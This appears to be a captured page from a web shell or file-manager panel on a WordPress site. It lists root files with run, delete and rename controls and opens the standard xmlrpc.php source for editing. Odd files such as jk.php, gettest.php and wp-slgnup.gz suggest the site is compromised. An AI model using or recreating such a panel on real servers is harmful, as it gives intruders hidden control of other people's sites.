at path:
ROOT
/
xmlrpc.php
run:
R
W
Run
.teams
DIR
2026-02-04 08:26:17
R
W
Run
.tmb
DIR
2025-12-17 02:22:31
R
W
Run
.well-known
DIR
2025-12-16 06:51:55
R
W
Run
att
DIR
2026-01-03 07:41:24
R
W
Run
cgi-bin
DIR
2025-12-16 06:52:09
R
W
Run
wp-admin
DIR
2026-04-06 07:22:45
R
W
Run
wp-content
DIR
2026-04-14 00:58:39
R
W
Run
wp-includes
DIR
2026-04-07 02:26:56
R
W
Run
.htaccess
233 By
2026-04-09 02:00:07
R
W
Run
Delete
Rename
bots.txt
1.08 KB
2026-04-13 09:19:12
R
W
Run
Delete
Rename
classwithtostring.php
15.05 KB
2026-02-02 07:55:53
R
W
Run
Delete
Rename
comment.php
31.31 KB
2026-04-07 02:27:00
R
W
Run
Delete
Rename
content.php
31.31 KB
2026-04-07 02:27:04
R
W
Run
Delete
Rename
error_log
8.84 MB
2026-04-14 09:46:09
R
W
Run
Delete
Rename
gettest.php
1.41 KB
2026-04-13 09:13:42
R
W
Run
Delete
Rename
google937eb35d53351b9b.html
53 By
2025-12-08 08:15:20
R
W
Run
Delete
Rename
googlea6034f4294d19323.html
53 By
2026-04-07 02:26:53
R
W
Run
Delete
Rename
googleaa60eb9ae1b0bd93.html
53 By
2026-04-13 09:04:18
R
W
Run
Delete
Rename
index.php
574 By
2026-04-13 11:17:01
R
W
Run
Delete
Rename
jk.php
8.7 KB
2026-04-13 09:04:21
R
W
Run
Delete
Rename
license.txt
19.44 KB
2025-12-03 19:05:43
R
W
Run
Delete
Rename
readme.html
7.25 KB
2026-03-12 02:29:00
R
W
Run
Delete
Rename
robots.txt
71 By
2026-04-14 09:46:03
R
W
Run
Delete
Rename
wp-activate.php
7.18 KB
2025-12-03 19:05:42
R
W
Run
Delete
Rename
wp-comments-post.php
2.27 KB
2023-06-14 18:11:16
R
W
Run
Delete
Rename
wp-config-sample.php
3.26 KB
2025-12-03 19:05:43
R
W
Run
Delete
Rename
wp-config.php
3.6 KB
2025-12-16 06:49:22
R
W
Run
Delete
Rename
wp-cron.php
5.49 KB
2024-08-02 23:40:16
R
W
Run
Delete
Rename
wp-links-opml.php
2.43 KB
2025-12-03 19:05:42
R
W
Run
Delete
Rename
wp-load.php
3.98 KB
2025-12-16 06:49:22
R
W
Run
wp-login.php
50.33 KB
2025-12-08 08:15:38
R
W
Run
Delete
Rename
wp-mail.php
8.52 KB
2025-12-03 19:05:43
R
W
Run
Delete
Rename
wp-settings.php
33.27 KB
2025-12-16 06:49:22
R
W
Run
Delete
Rename
wp-signup.php
33.71 KB
2025-03-10 22:16:28
R
W
Run
Delete
Rename
wp-slgnup.gz
2.72 KB
2026-04-13 11:16:58
R
W
Run
Delete
Rename
wp-trackback.php
5.09 KB
2025-12-03 19:05:43
R
W
Run
Delete
Rename
xmlrpc.php
3.13 KB
2024-11-08 20:52:18
R
W
Run
Delete
Rename
error_log
up
📄
xmlrpc.php
Save
<?php /** * XML-RPC protocol support for WordPress * * @package WordPress */ /** * Whether this is an XML-RPC Request. * * @var bool */ define( 'XMLRPC_REQUEST', true ); // Discard unneeded cookies sent by some browser-embedded clients. $_COOKIE = array(); // $HTTP_RAW_POST_DATA was deprecated in PHP 5.6 and removed in PHP 7.0. // phpcs:disable PHPCompatibility.Variables.RemovedPredefinedGlobalVariables.http_raw_post_dataDeprecatedRemoved if ( ! isset( $HTTP_RAW_POST_DATA ) ) { $HTTP_RAW_POST_DATA = file_get_contents( 'php://input' ); } // Fix for mozBlog and other cases where '<?xml' isn't on the very first line. $HTTP_RAW_POST_DATA = trim( $HTTP_RAW_POST_DATA ); // phpcs:enable /** Include the bootstrap for setting up WordPress environment */ require_once __DIR__ . '/wp-load.php'; if ( isset( $_GET['rsd'] ) ) { // https://cyber.harvard.edu/blogs/gems/tech/rsd.html header( 'Content-Type: text/xml; charset=' . get_option( 'blog_charset' ), true ); echo '<?xml version="1.0" encoding="' . get_option( 'blog_charset' ) . '"?' . '>'; ?> <rsd version="1.0" xmlns="http://archipelago.phrasewise.com/rsd"> <service> <engineName>WordPress</engineName> <engineLink>https://wordpress.org/</engineLink> <homePageLink><?php bloginfo_rss( 'url' ); ?></homePageLink> <apis> <api name="WordPress" blogID="1" preferred="true" apiLink="<?php echo site_url( 'xmlrpc.php', 'rpc' ); ?>" /> <api name="Movable Type" blogID="1" preferred="false" apiLink="<?php echo site_url( 'xmlrpc.php', 'rpc' ); ?>" /> <api name="MetaWeblog" blogID="1" preferred="false" apiLink="<?php echo site_url( 'xmlrpc.php', 'rpc' ); ?>" /> <api name="Blogger" blogID="1" preferred="false" apiLink="<?php echo site_url( 'xmlrpc.php', 'rpc' ); ?>" /> <?php /** * Fires when adding APIs to the Really Simple Discovery (RSD) endpoint. * * @link https://cyber.harvard.edu/blogs/gems/tech/rsd.html * * @since 3.5.0 */ do_action( 'xmlrpc_rsd_apis' ); ?> </apis> </service> </rsd> <?php exit; } require_once ABSPATH . 'wp-admin/includes/admin.php'; require_once ABSPATH . WPINC . '/class-IXR.php'; require_once ABSPATH . WPINC . '/class-wp-xmlrpc-server.php'; /** * Posts submitted via the XML-RPC interface get that title * * @name post_default_title * @var string */ $post_default_title = ''; /** * Filters the class used for handling XML-RPC requests. * * @since 3.1.0 * * @param string $class The name of the XML-RPC server class. */ $wp_xmlrpc_server_class = apply_filters( 'wp_xmlrpc_server_class', 'wp_xmlrpc_server' ); $wp_xmlrpc_server = new $wp_xmlrpc_server_class(); // Fire off the request. $wp_xmlrpc_server->serve_request(); exit; /** * logIO() - Writes logging info to a file. * * @since 1.2.0 * @deprecated 3.4.0 Use error_log() * @see error_log() * * @global int|bool $xmlrpc_logging Whether to enable XML-RPC logging. * * @param string $io Whether input or output. * @param string $msg Information describing logging reason. */ function logIO( $io, $msg ) { _deprecated_function( __FUNCTION__, '3.4.0', 'error_log()' ); if ( ! empty( $GLOBALS['xmlrpc_logging'] ) ) { error_log( $io . ' - ' . $msg ); } }